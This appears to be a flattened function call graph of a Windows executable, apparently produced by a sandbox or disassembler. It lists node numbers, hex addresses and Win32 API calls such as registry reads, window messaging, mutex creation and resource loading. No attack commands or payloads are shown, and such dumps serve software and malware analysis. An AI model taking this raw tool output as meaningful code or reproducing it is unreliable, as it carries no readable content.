42d7dc GetModuleHandleA GetProcAddress 49358->49359 49360 42d7f5 49359->49360 49360->49032 49423 42dc54 49361->49423 49363 4770da 49364 477100 49363->49364 49365 4770de 49363->49365 49367 403400 4 API calls 49364->49367 49426 42db84 49365->49426 49369 477107 49367->49369 49369->49048 49370 4770f5 RegCloseKey 49370->49369 49371 403400 4 API calls 49371->49370 49373 42c376 49372->49373 49374 42c399 49372->49374 49446 42c858 CharPrevA 49373->49446 49375 403494 4 API calls 49374->49375 49377 42c3a2 49375->49377 49377->49070 49378 42c37d 49378->49374 49379 42c388 49378->49379 49380 4035c0 4 API calls 49379->49380 49381 42c396 49380->49381 49381->49070 49383 4035c4 49382->49383 49391 40357c 49382->49391 49384 403450 49383->49384 49385 4035e2 49383->49385 49386 4035d4 49383->49386 49383->49391 49388 4034bc 4 API calls 49384->49388 49393 403464 49384->49393 49390 4034bc 4 API calls 49385->49390 49389 403450 4 API calls 49386->49389 49387 403490 49387->49075 49388->49393 49389->49391 49401 4035f5 49390->49401 49391->49384 49392 4035bf 49391->49392 49394 40358a 49391->49394 49392->49075 49393->49387 49395 402660 4 API calls 49393->49395 49396 4035b4 49394->49396 49397 40359d 49394->49397 49395->49387 49399 4038a4 4 API calls 49396->49399 49398 4038a4 4 API calls 49397->49398 49400 4035a2 49398->49400 49399->49400 49400->49075 49402 403450 4 API calls 49401->49402 49403 403621 49402->49403 49403->49075 49405 4771a6 49404->49405 49406 42dc54 RegOpenKeyExA 49405->49406 49407 4771ce 49406->49407 49408 4771ff 49407->49408 49409 42db84 6 API calls 49407->49409 49408->49083 49410 4771e4 49409->49410 49411 42db84 6 API calls 49410->49411 49412 4771f6 RegCloseKey 49411->49412 49412->49408 49414 4038a4 4 API calls 49413->49414 49416 42d0f7 49414->49416 49415 42d10e GetEnvironmentVariableA 49415->49416 49417 42d11a 49415->49417 49416->49415 49420 42d121 49416->49420 49447 42da08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49416->49447 49418 403400 4 API calls 49417->49418 49418->49420 49420->49041 49421->49076 49422->49060 49424 42dc65 RegOpenKeyExA 49423->49424 49425 42dc5f 49423->49425 49424->49363 49425->49424 49429 42da38 49426->49429 49430 42da5e RegQueryValueExA 49429->49430 49431 42daa3 49430->49431 49437 42da81 49430->49437 49432 403400 4 API calls 49431->49432 49434 42db6f 49432->49434 49433 42da9b 49435 403400 4 API calls 49433->49435 49434->49370 49434->49371 49435->49431 49436 4034e0 4 API calls 49436->49437 49437->49431 49437->49433 49437->49436 49438 403744 4 API calls 49437->49438 49439 42dad8 RegQueryValueExA 49438->49439 49439->49430 49440 42daf4 49439->49440 49440->49431 49441 4038a4 4 API calls 49440->49441 49442 42db36 49441->49442 49443 42db48 49442->49443 49445 403744 4 API calls 49442->49445 49444 403450 4 API calls 49443->49444 49444->49431 49445->49443 49446->49378 49447->49416 49451 4523c8 49448->49451 49452 4523ed CreateDirectoryA 49451->49452 49457 4508e0 4 API calls 49451->49457 49463 42e670 5 API calls 49451->49463 49464 4508b0 4 API calls 49451->49464 49504 42d850 49451->49504 49527 452134 49451->49527 49546 406cd0 19 API calls 49451->49546 49547 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49451->49547 49453 452465 49452->49453 49454 4523f7 GetLastError 49452->49454 49455 403494 4 API calls 49453->49455 49454->49451 49456 45246f 49455->49456 49458 403420 4 API calls 49456->49458 49457->49451 49459 452489 49458->49459 49461 403420 4 API calls 49459->49461 49462 452496 49461->49462 49462->49091 49463->49451 49464->49451 49467 403580 49466->49467 49468 4035bf 49466->49468 49469 403450 49467->49469 49470 40358a 49467->49470 49468->49096 49476 4034bc 4 API calls 49469->49476 49477 403464 49469->49477 49471 4035b4 49470->49471 49472 40359d 49470->49472 49474 4038a4 4 API calls 49471->49474 49473 4038a4 4 API calls 49472->49473 49479 4035a2 49473->49479 49474->49479 49475 403490 49475->49096 49476->49477 49477->49475 49478 402660 4 API calls 49477->49478 49478->49475 49479->49096 49598 40d0ac 49480->49598 49496->49099 49497->49115 49499 4508d0 49498->49499 49649 450788 49499->49649 49505 42d0e4 5 API calls 49504->49505 49506 42d876 49505->49506 49507 42d882 49506->49507 49548 42cc24 49506->49548 49509 42d0e4 5 API calls 49507->49509 49510 42d8ce 49507->49510 49512 42d892 49509->49512 49513 42c6e0 5 API calls 49510->49513 49511 42d89e 49511->49510 49515 42d8c3 49511->49515 49518 42d0e4 5 API calls 49511->49518 49512->49511 49514 42cc24 7 API calls 49512->49514 49517 42d8d8 49513->49517 49514->49511 49515->49510 49516 42d774 GetWindowsDirectoryA 49515->49516 49516->49510 49519 42c36c 5 API calls 49517->49519 49520 42d8b7 49518->49520 49521 42d8e3 49519->49521 49520->49515 49523 42cc24 7 API calls 49520->49523 49522 403494 4 API calls 49521->49522 49524 42d8ed 49522->49524 49523->49515 49525 403420 4 API calls 49524->49525 49526 42d907 49525->49526 49526->49451 49528 452154 49527->49528 49529 42c36c 5 API calls 49528->49529 49530 45216d 49529->49530 49531 403494 4 API calls 49530->49531 49532 452178 49531->49532 49533 42ca9c 6 API calls 49532->49533 49535 4508e0 4 API calls 49532->49535 49539 4521f4 49532->49539 49568 4520c0 49532->49568 49576 403634 49532->49576 49582 451374 49532->49582 49590 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49532->49590 49533->49532 49535->49532 49540 403494 4 API calls 49539->49540 49541 4521ff 49540->49541 49542 403420 4 API calls 49541->49542 49543 452219 49542->49543 49544 403400 4 API calls 49543->49544 49545 452221 49544->49545 49545->49451 49546->49451 49547->49451 49551 42cba8 49548->49551 49557 42ca9c 49551->49557 49553 42cbca 49554 42cbd2 GetFileAttributesA 49553->49554 49555 403400 4 API calls 49554->49555 49556 42cbef 49555->49556 49556->49507 49558 42c59c IsDBCSLeadByte 49557->49558 49559 42caad 49558->49559 49561 42cad4 49559->49561 49567 42ca20 CharPrevA 49559->49567 49562 42caea 49561->49562 49563 42cadf 49561->49563 49565 403778 4 API calls 49562->49565 49564 403494 4 API calls 49563->49564 49566 42cae8 49564->49566 49565->49566 49566->49553 49567->49559 49569 403400 4 API calls 49568->49569 49570 4520e1 49569->49570 49571 403510 4 API calls 49570->49571 49573 45210e 49570->49573 49591 403800 49570->49591 49571->49570 49574 403400 4 API calls 49573->49574 49575 452123 49574->49575 49575->49532 49577 40363c 49576->49577 49578 4034bc 4 API calls 49577->49578 49579 40364f 49578->49579 49580 403450 4 API calls 49579->49580 49581 403677 49580->49581 49583 4510a8 2 API calls 49582->49583 49584 45138a 49583->49584 49585 45138e 49584->49585 49595 42cc38 49584->49595 49585->49532 49588 4510e4 Wow64RevertWow64FsRedirection 49589 4513c9 49588->49589 49589->49532 49590->49532 49592 403804 49591->49592 49594 40382f 49591->49594 49593 4038a4 4 API calls 49592->49593 49593->49594 49594->49570 49596 42cba8 7 API calls 49595->49596 49597 42cc42 GetLastError 49596->49597 49597->49588 49599 40d0b6 49598->49599 49609 40d170 FindResourceA 49599->49609 49601 40d0e4 49602 477554 49601->49602 49621 40cf00 49602->49621 49610 40d195 49609->49610 49611 40d19c LoadResource 49609->49611 49619 40d0fc 19 API calls 49610->49619 49613 40d1b6 SizeofResource LockResource 49611->49613 49614 40d1af 49611->49614 49617 40d1d4 49613->49617 49620 40d0fc 19 API calls 49614->49620 49615 40d19b 49615->49611 49617->49601 49618 40d1b5 49618->49613 49619->49615 49620->49618 49650 403400 4 API calls 49649->49650 49658 4507b9 49650->49658 51486 48c62c 51487 48c660 51486->51487 51488 48c662 51487->51488 51489 48c676 51487->51489 51622 446830 18 API calls 51488->51622 51492 48c6b2 51489->51492 51493 48c685 51489->51493 51491 48c66b Sleep 51610 48c6ad 51491->51610 51498 48c6ee 51492->51498 51499 48c6c1 51492->51499 51495 44688c 18 API calls 51493->51495 51494 403420 4 API calls 51496 48cb20 51494->51496 51497 48c694 51495->51497 51501 48c69c FindWindowA 51497->51501 51504 48c6fd 51498->51504 51505 48c744 51498->51505 51500 44688c 18 API calls 51499->51500 51503 48c6ce 51500->51503 51502 446b0c 5 API calls 51501->51502 51502->51610 51507 48c6d6 FindWindowA 51503->51507 51623 446830 18 API calls 51504->51623 51511 48c7a0 51505->51511 51512 48c753 51505->51512 51509 446b0c 5 API calls 51507->51509 51508 48c709 51624 446830 18 API calls 51508->51624 51619 48c6e9 51509->51619 51519 48c7fc 51511->51519 51520 48c7af 51511->51520 51627 446830 18 API calls 51512->51627 51513 48c716 51625 446830 18 API calls 51513->51625 51516 48c75f 51628 446830 18 API calls 51516->51628 51518 48c723 51626 446830 18 API calls 51518->51626 51529 48c80b 51519->51529 51530 48c836 51519->51530 51632 446830 18 API calls 51520->51632 51521 48c76c 51629 446830 18 API calls 51521->51629 51525 48c72e SendMessageA 51528 446b0c 5 API calls 51525->51528 51526 48c7bb 51633 446830 18 API calls 51526->51633 51527 48c779 51630 446830 18 API calls 51527->51630 51528->51619 51533 44688c 18 API calls 51529->51533 51539 48c884 51530->51539 51540 48c845 51530->51540 51537 48c818 51533->51537 51534 48c7c8 51634 446830 18 API calls 51534->51634 51536 48c784 PostMessageA 51631 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51536->51631 51544 48c820 RegisterClipboardFormatA 51537->51544 51538 48c7d5 51635 446830 18 API calls 51538->51635 51550 48c8d8 51539->51550 51551 48c893 51539->51551 51637 446830 18 API calls 51540->51637 51547 446b0c 5 API calls 51544->51547 51545 48c7e0 SendNotifyMessageA 51636 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51545->51636 51546 48c851 51638 446830 18 API calls 51546->51638 51547->51610 51558 48c92c 51550->51558 51559 48c8e7 51550->51559 51640 446830 18 API calls 51551->51640 51553 48c85e 51639 446830 18 API calls 51553->51639 51554 48c89f 51641 446830 18 API calls 51554->51641 51557 48c869 SendMessageA 51561 446b0c 5 API calls 51557->51561 51566 48c93b 51558->51566 51567 48c98e 51558->51567 51644 446830 18 API calls 51559->51644 51560 48c8ac 51642 446830 18 API calls 51560->51642 51561->51619 51564 48c8f3 51645 446830 18 API calls 51564->51645 51565 48c8b7 PostMessageA 51643 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51565->51643 51570 44688c 18 API calls 51566->51570 51575 48c99d 51567->51575 51576 48ca15 51567->51576 51573 48c948 51570->51573 51571 48c900 51646 446830 18 API calls 51571->51646 51577 42e1f0 2 API calls 51573->51577 51574 48c90b SendNotifyMessageA 51647 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51574->51647 51579 44688c 18 API calls 51575->51579 51586 48ca4a 51576->51586 51587 48ca24 51576->51587 51580 48c955 51577->51580 51581 48c9ac 51579->51581 51582 48c96b GetLastError 51580->51582 51583 48c95b 51580->51583 51648 446830 18 API calls 51581->51648 51584 446b0c 5 API calls 51582->51584 51585 446b0c 5 API calls 51583->51585 51589 48c969 51584->51589 51585->51589 51594 48ca59 51586->51594 51595 48ca7c 51586->51595 51653 446830 18 API calls 51587->51653 51591 446b0c 5 API calls 51589->51591 51590 48ca2e FreeLibrary 51654 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51590->51654 51591->51610 51597 44688c 18 API calls 51594->51597 51604 48ca8b 51595->51604 51609 48cabf 51595->51609 51596 48c9bf GetProcAddress 51598 48c9cb 51596->51598 51599 48ca05 51596->51599 51600 48ca65 51597->51600 51649 446830 18 API calls 51598->51649 51652 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51599->51652 51607 48ca6d CreateMutexA 51600->51607 51603 48c9d7 51650 446830 18 API calls 51603->51650 51655 4869a8 18 API calls 51604->51655 51607->51610 51608 48c9e4 51613 446b0c 5 API calls 51608->51613 51609->51610 51657 4869a8 18 API calls 51609->51657 51610->51494 51612 48ca97 51614 48caa8 OemToCharBuffA 51612->51614 51615 48c9f5 51613->51615 51656 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51614->51656 51651 446964 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51615->51651 51618 48cada 51620 48caeb CharToOemBuffA 51618->51620 51619->51610 51658 4869c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 51620->51658 51622->51491 51623->51508 51624->51513 51625->51518 51626->51525 51627->51516 51628->51521 51629->51527 51630->51536 51631->51619 51632->51526 51633->51534 51634->51538 51635->51545 51636->51610 51637->51546 51638->51553 51639->51557 51640->51554 51641->51560 51642->51565 51643->51619 51644->51564 51645->51571 51646->51574 51647->51610 51648->51596 51649->51603 51650->51608 51651->51619 51652->51619 51653->51590 51654->51610 51655->51612 51656->51610 51657->51618 51658->51610 48141 41edc4 48142 41edd3 IsWindowVisible 48141->48142 48143 41ee09 48141->48143 48142->48143 48144 41eddd IsWindowEnabled 48142->48144 48144->48143 48145 41ede7 48144->48145 48148 402648 48145->48148 48147 41edf1 EnableWindow 48147->48143 48149 40264c 48148->48149 48150 402656 48148->48150 48149->48150 48152 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48149->48152 48150->48147 48150->48150 48152->48150 51659 49292c 51713 403344 51659->51713 51661 49293a 51716 4056a0 51661->51716 51663 49293f 51719 4098b4 51663->51719 51667 492949 51729 4108c4 51667->51729 51669 49294e 51733 412898 51669->51733 51671 492958 51738 418fb0 GetVersion 51671->51738 51976 4032fc 51713->51976 51715 403349 GetModuleHandleA GetCommandLineA 51715->51661 51718 4056db 51716->51718 51977 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51716->51977 51718->51663 51978 408f8c 51719->51978 51728 409ae8 6F571CD0 51728->51667 51730 4108ce 51729->51730 51731 41090d GetCurrentThreadId 51730->51731 51732 410928 51731->51732 51732->51669 52058 40ae6c 51733->52058 51737 4128c4 51737->51671 52070 41dd94 8 API calls 51738->52070 51740 418fc9 52072 418ea8 GetCurrentProcessId 51740->52072 51976->51715 51977->51718 51979 408c24 5 API calls 51978->51979 51980 408f9d 51979->51980 51981 408544 GetSystemDefaultLCID 51980->51981 51984 40857a 51981->51984 51982 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51982->51984 51983 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51983->51984 51984->51982 51984->51983 51985 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 51984->51985 51986 4085dc 51984->51986 51985->51984 51987 406d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 51986->51987 51988 4084d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 51986->51988 51989 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51986->51989 51990 40865f 51986->51990 51987->51986 51988->51986 51989->51986 51991 403420 4 API calls 51990->51991 51992 408679 51991->51992 51993 408688 GetSystemDefaultLCID 51992->51993 52050 4084d0 GetLocaleInfoA 51993->52050 51996 403450 4 API calls 51997 4086c8 51996->51997 51998 4084d0 5 API calls 51997->51998 51999 4086dd 51998->51999 52000 4084d0 5 API calls 51999->52000 52001 408701 52000->52001 52056 40851c GetLocaleInfoA 52001->52056 52004 40851c GetLocaleInfoA 52005 408731 52004->52005 52006 4084d0 5 API calls 52005->52006 52007 40874b 52006->52007 52008 40851c GetLocaleInfoA 52007->52008 52009 408768 52008->52009 52010 4084d0 5 API calls 52009->52010 52011 408782 52010->52011 52012 403450 4 API calls 52011->52012 52013 40878f 52012->52013 52014 4084d0 5 API calls 52013->52014 52015 4087a4 52014->52015 52016 403450 4 API calls 52015->52016 52017 4087b1 52016->52017 52018 40851c GetLocaleInfoA 52017->52018 52019 4087bf 52018->52019 52020 4084d0 5 API calls 52019->52020 52021 4087d9 52020->52021 52022 403450 4 API calls 52021->52022 52023 4087e6 52022->52023 52024 4084d0 5 API calls 52023->52024 52025 4087fb 52024->52025 52026 403450 4 API calls 52025->52026 52027 408808 52026->52027 52028 4084d0 5 API calls 52027->52028 52029 40881d 52028->52029 52030 40883a 52029->52030 52031 40882b 52029->52031 52033 403494 4 API calls 52030->52033 52032 403494 4 API calls 52031->52032 52034 408838 52032->52034 52033->52034 52035 4084d0 5 API calls 52034->52035 52036 40885c 52035->52036 52037 408879 52036->52037 52038 40886a 52036->52038 52039 403400 4 API calls 52037->52039 52040 403494 4 API calls 52038->52040 52041 408877 52039->52041 52040->52041 52042 403634 4 API calls 52041->52042 52043 40889b 52042->52043 52044 403634 4 API calls 52043->52044 52045 4088b5 52044->52045 52046 403420 4 API calls 52045->52046 52047 4088cf 52046->52047 52048 408fd8 GetVersionExA 52047->52048 52049 408fef 52048->52049 52049->51728 52051 4084f7 52050->52051 52052 408509 52050->52052 52053 4034e0 4 API calls 52051->52053 52054 403494 4 API calls 52052->52054 52055 408507 52053->52055 52054->52055 52055->51996 52057 408538 52056->52057 52057->52004 52059 40ae73 52058->52059 52059->52059 52060 40ae92 52059->52060 52069 40ada4 19 API calls 52059->52069 52062 410f7c 52060->52062 52063 410f9e 52062->52063 52064 406d54 5 API calls 52063->52064 52065 403450 4 API calls 52063->52065 52066 410fbd 52063->52066 52064->52063 52065->52063 52067 403400 4 API calls 52066->52067 52068 410fd2 52067->52068 52068->51737 52069->52059 52071 41de0e 52070->52071 52071->51740 52088 407828 52072->52088 52089 40783b 52088->52089 52090 407520 19 API calls 52089->52090 52091 40784f GlobalAddAtomA GetCurrentThreadId 52090->52091 48153 42e24b SetErrorMode 48154 41fac8 48155 41fad1 48154->48155 48158 41fd6c 48155->48158 48157 41fade 48159 41fe5e 48158->48159 48160 41fd83 48158->48160 48159->48157 48160->48159 48179 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 48160->48179 48162 41fdb9 48163 41fde3 48162->48163 48164 41fdbd 48162->48164 48189 41f92c GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 48163->48189 48180 41fb0c 48164->48180 48167 41fdf1 48169 41fdf5 48167->48169 48170 41fe1b 48167->48170 48173 41fb0c 10 API calls 48169->48173 48174 41fb0c 10 API calls 48170->48174 48171 41fb0c 10 API calls 48172 41fde1 48171->48172 48172->48157 48175 41fe07 48173->48175 48176 41fe2d 48174->48176 48177 41fb0c 10 API calls 48175->48177 48178 41fb0c 10 API calls 48176->48178 48177->48172 48178->48172 48179->48162 48181 41fb27 48180->48181 48182 41f8ac 4 API calls 48181->48182 48183 41fb3d 48181->48183 48182->48183 48190 41f8ac 48183->48190 48185 41fb85 48186 41fba8 SetScrollInfo 48185->48186 48198 41fa0c 48186->48198 48189->48167 48209 418150 48190->48209 48192 41f8c9 GetWindowLongA 48193 41f906 48192->48193 48194 41f8e6 48192->48194 48212 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 48193->48212 48211 41f838 GetWindowLongA GetSystemMetrics GetSystemMetrics 48194->48211 48197 41f8f2 48197->48185 48199 41fa1a 48198->48199 48200 41fa22 48198->48200 48199->48171 48201 41fa61 48200->48201 48202 41fa51 48200->48202 48208 41fa5f 48200->48208 48214 417db8 IsWindowVisible ScrollWindow SetWindowPos 48201->48214 48213 417db8 IsWindowVisible ScrollWindow SetWindowPos 48202->48213 48204 41faa1 GetScrollPos 48204->48199 48206 41faac 48204->48206 48207 41fabb SetScrollPos 48206->48207 48207->48199 48208->48204 48210 41815a 48209->48210 48210->48192 48211->48197 48212->48197 48213->48208 48214->48208 48215 420508 48216 42051b 48215->48216 48236 415aa0 48216->48236 48218 420662 48219 420679 48218->48219 48243 414644 KiUserCallbackDispatcher 48218->48243 48220 420690 48219->48220 48244 414688 KiUserCallbackDispatcher 48219->48244 48226 4206b2 48220->48226 48245 41ffd0 12 API calls 48220->48245 48221 4205c1 48241 4207b8 20 API calls 48221->48241 48222 420556 48222->48218 48222->48221 48229 4205b2 MulDiv 48222->48229 48227 4205da 48227->48218 48242 41ffd0 12 API calls 48227->48242 48240 41a274 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 48229->48240 48232 4205f7 48233 420613 MulDiv 48232->48233 48234 420636 48232->48234 48233->48234 48234->48218 48235 42063f MulDiv 48234->48235 48235->48218 48237 415ab2 48236->48237 48246 4143e0 48237->48246 48239 415aca 48239->48222 48240->48221 48241->48227 48242->48232 48243->48219 48244->48220 48245->48226 48247 4143fa 48246->48247 48250 4105b8 48247->48250 48249 414410 48249->48239 48253 40de04 48250->48253 48252 4105be 48252->48249 48254 40de66 48253->48254 48257 40de17 48253->48257 48260 40de74 48254->48260 48258 40de74 19 API calls 48257->48258 48259 40de41 48258->48259 48259->48252 48261 40de84 48260->48261 48263 40de9a 48261->48263 48272 40d740 48261->48272 48292 40e1fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48261->48292 48275 40e0ac 48263->48275 48266 40d740 5 API calls 48267 40dea2 48266->48267 48267->48266 48268 40df0e 48267->48268 48278 40dcc0 48267->48278 48270 40e0ac 5 API calls 48268->48270 48271 40de70 48270->48271 48271->48252 48293 40eb68 48272->48293 48301 40d61c 48275->48301 48310 40e0b4 48278->48310 48283 40eacc 5 API calls 48284 40dd09 48283->48284 48285 40dd24 48284->48285 48286 40dd1b 48284->48286 48291 40dd21 48284->48291 48326 40db38 48285->48326 48329 40dc28 19 API calls 48286->48329 48330 403420 48291->48330 48292->48261 48296 40d8e0 48293->48296 48299 40d8eb 48296->48299 48297 40d74a 48297->48261 48299->48297 48300 40d92c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48299->48300 48300->48299 48302 40eb68 5 API calls 48301->48302 48303 40d629 48302->48303 48304 40d63c 48303->48304 48308 40ec6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48303->48308 48304->48267 48306 40d637 48309 40d5b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48306->48309 48308->48306 48309->48304 48334 40d8c4 48310->48334 48313 40dcf3 48317 40eacc 48313->48317 48314 40eb68 5 API calls 48315 40e0d8 48314->48315 48315->48313 48337 40e038 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 48315->48337 48318 40d8e0 5 API calls 48317->48318 48319 40eae1 48318->48319 48338 4034e0 48319->48338 48323 40eaf6 48324 40d8e0 5 API calls 48323->48324 48325 40dcfe 48324->48325 48325->48283 48360 40acdc 19 API calls 48326->48360 48328 40db60 48328->48291 48329->48291 48332 403426 48330->48332 48331 40344b 48331->48267 48332->48331 48333 402660 4 API calls 48332->48333 48333->48332 48335 40eb68 5 API calls 48334->48335 48336 40d8ce 48335->48336 48336->48313 48336->48314 48337->48313 48347 4034bc 48338->48347 48340 4034f0 48352 403400 48340->48352 48343 403744 48344 40374a 48343->48344 48346 40375b 48343->48346 48345 4034bc 4 API calls 48344->48345 48344->48346 48345->48346 48346->48323 48348 4034c0 48347->48348 48349 4034dc 48347->48349 48350 402648 4 API calls 48348->48350 48349->48340 48351 4034c9 48350->48351 48351->48340 48353 40341f 48352->48353 48354 403406 48352->48354 48353->48343 48354->48353 48356 402660 48354->48356 48357 402664 48356->48357 48358 40266e 48356->48358 48357->48358 48359 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48357->48359 48358->48353 48358->48358 48359->48358 48360->48328 53558 440c28 53559 440c31 53558->53559 53560 440c3f WriteFile 53558->53560 53559->53560 53561 440c4a 53560->53561 53562 4135ac SetWindowLongA GetWindowLongA 53563 413609 SetPropA SetPropA 53562->53563 53564 4135eb GetWindowLongA 53562->53564 53568 41f30c 53563->53568 53564->53563 53565 4135fa SetWindowLongA 53564->53565 53565->53563 53573 4151e0 53568->53573 53580 423b7c 53568->53580 53674 4239f4 53568->53674 53569 413659 53574 4151ed 53573->53574 53575 415253 53574->53575 53576 415248 53574->53576 53579 415251 53574->53579 53681 424afc 13 API calls 53575->53681 53576->53579 53682 414fcc 46 API calls 53576->53682 53579->53569 53583 423bb2 53580->53583 53597 423bd3 53583->53597 53683 423ad8 53583->53683 53584 423c5c 53586 423c63 53584->53586 53587 423c97 53584->53587 53585 423bfd 53588 423c03 53585->53588 53589 423cc0 53585->53589 53592 423c69 53586->53592 53632 423f21 53586->53632 53595 423ca2 53587->53595 53596 42400a IsIconic 53587->53596 53593 423c35 53588->53593 53594 423c08 53588->53594 53590 423cd2 53589->53590 53591 423cdb 53589->53591 53598 423ce8 53590->53598 53599 423cd9 53590->53599 53692 424104 11 API calls 53591->53692 53601 423e83 SendMessageA 53592->53601 53602 423c77 53592->53602 53593->53597 53623 423c4e 53593->53623 53624 423daf 53593->53624 53604 423d66 53594->53604 53605 423c0e 53594->53605 53606 424046 53595->53606 53607 423cab 53595->53607 53596->53597 53603 42401e GetFocus 53596->53603 53597->53569 53608 42414c 11 API calls 53598->53608 53693 423af4 NtdllDefWindowProc_A 53599->53693 53601->53597 53602->53597 53633 423c30 53602->53633 53653 423ec6 53602->53653 53603->53597 53609 42402f 53603->53609 53697 423af4 NtdllDefWindowProc_A 53604->53697 53610 423c17 53605->53610 53611 423d8e PostMessageA 53605->53611 53712 4247c0 WinHelpA PostMessageA 53606->53712 53614 42405d 53607->53614 53607->53633 53608->53597 53711 41ef64 GetCurrentThreadId 73A25940 53609->53711 53618 423c20 53610->53618 53619 423e15 53610->53619 53698 423af4 NtdllDefWindowProc_A 53611->53698 53621 424066 53614->53621 53622 42407b 53614->53622 53627 423c29 53618->53627 53628 423d3e IsIconic 53618->53628 53629 423e1e 53619->53629 53630 423e4f 53619->53630 53620 423da9 53620->53597 53631 424444 5 API calls 53621->53631 53713 42449c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53622->53713 53623->53633 53634 423d7b 53623->53634 53687 423af4 NtdllDefWindowProc_A 53624->53687 53626 424036 53626->53597 53638 42403e SetFocus 53626->53638 53627->53633 53639 423d01 53627->53639 53641 423d5a 53628->53641 53642 423d4e 53628->53642 53700 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53629->53700 53688 423af4 NtdllDefWindowProc_A 53630->53688 53631->53597 53632->53597 53648 423f47 IsWindowEnabled 53632->53648 53633->53597 53691 423af4 NtdllDefWindowProc_A 53633->53691 53636 4240e8 12 API calls 53634->53636 53636->53597 53637 423db5 53645 423df3 53637->53645 53646 423dd1 53637->53646 53638->53597 53639->53597 53694 422bbc ShowWindow PostMessageA PostQuitMessage 53639->53694 53696 423af4 NtdllDefWindowProc_A 53641->53696 53695 423b30 15 API calls 53642->53695 53654 4239f4 6 API calls 53645->53654 53699 423a84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53646->53699 53647 423e26 53656 423e38 53647->53656 53701 41eec8 53647->53701 53648->53597 53657 423f55 53648->53657 53651 423e55 53658 423e6d 53651->53658 53689 41ee14 GetCurrentThreadId 73A25940 53651->53689 53653->53597 53661 423ee8 IsWindowEnabled 53653->53661 53662 423dfb PostMessageA 53654->53662 53707 423af4 NtdllDefWindowProc_A 53656->53707 53667 423f5c IsWindowVisible 53657->53667 53659 4239f4 6 API calls 53658->53659 53659->53597 53660 423dd9 PostMessageA 53660->53597 53661->53597 53666 423ef6 53661->53666 53662->53597 53708 412280 7 API calls 53666->53708 53667->53597 53669 423f6a GetFocus 53667->53669 53670 418150 53669->53670 53671 423f7f SetFocus 53670->53671 53709 4151b0 53671->53709 53675 423a7d 53674->53675 53676 423a04 53674->53676 53675->53569 53676->53675 53677 423a0a EnumWindows 53676->53677 53677->53675 53678 423a26 GetWindow GetWindowLongA 53677->53678 53714 42398c GetWindow 53677->53714 53679 423a45 53678->53679 53679->53675 53680 423a71 SetWindowPos 53679->53680 53680->53675 53680->53679 53681->53579 53682->53579 53684 423ae2 53683->53684 53685 423aed 53683->53685 53684->53685 53686 408688 7 API calls 53684->53686 53685->53584 53685->53585 53686->53685 53687->53637 53688->53651 53690 41ee99 53689->53690 53690->53658 53691->53597 53692->53597 53693->53597 53694->53597 53695->53597 53696->53597 53697->53597 53698->53620 53699->53660 53700->53647 53702 41eed0 IsWindow 53701->53702 53703 41eefc 53701->53703 53704 41eedf EnableWindow 53702->53704 53706 41eeea 53702->53706 53703->53656 53704->53706 53705 402660 4 API calls 53705->53706 53706->53702 53706->53703 53706->53705 53707->53597 53708->53597 53710 4151cb SetFocus 53709->53710 53710->53597 53711->53626 53712->53620 53713->53620 53715 4239ad GetWindowLongA 53714->53715 53716 4239b9 53714->53716 53715->53716 48361 47b009 48366 45048c 48361->48366 48363 47b01d 48376 47a160 48363->48376 48365 47b041 48367 450499 48366->48367 48369 4504ed 48367->48369 48385 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48367->48385 48382 45034c 48369->48382 48373 450515 48374 450558 48373->48374 48387 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48373->48387 48374->48363 48392 40b528 48376->48392 48378 47a1cd 48378->48365 48380 47a182 48380->48378 48396 406944 48380->48396 48399 471c8c 48380->48399 48388 4502f8 48382->48388 48385->48369 48386 408b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48386->48373 48387->48374 48389 45030a 48388->48389 48390 45031b 48388->48390 48391 45030f InterlockedExchange 48389->48391 48390->48373 48390->48386 48391->48390 48393 40b533 48392->48393 48394 40b553 48393->48394 48415 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 48393->48415 48394->48380 48397 402648 4 API calls 48396->48397 48398 40694f 48397->48398 48398->48380 48409 471d06 48399->48409 48413 471cbd 48399->48413 48400 471d51 48416 45071c 48400->48416 48401 45071c 23 API calls 48401->48413 48403 471d68 48405 403420 4 API calls 48403->48405 48407 471d82 48405->48407 48406 4038a4 4 API calls 48406->48409 48407->48380 48409->48400 48409->48406 48411 403744 4 API calls 48409->48411 48412 403450 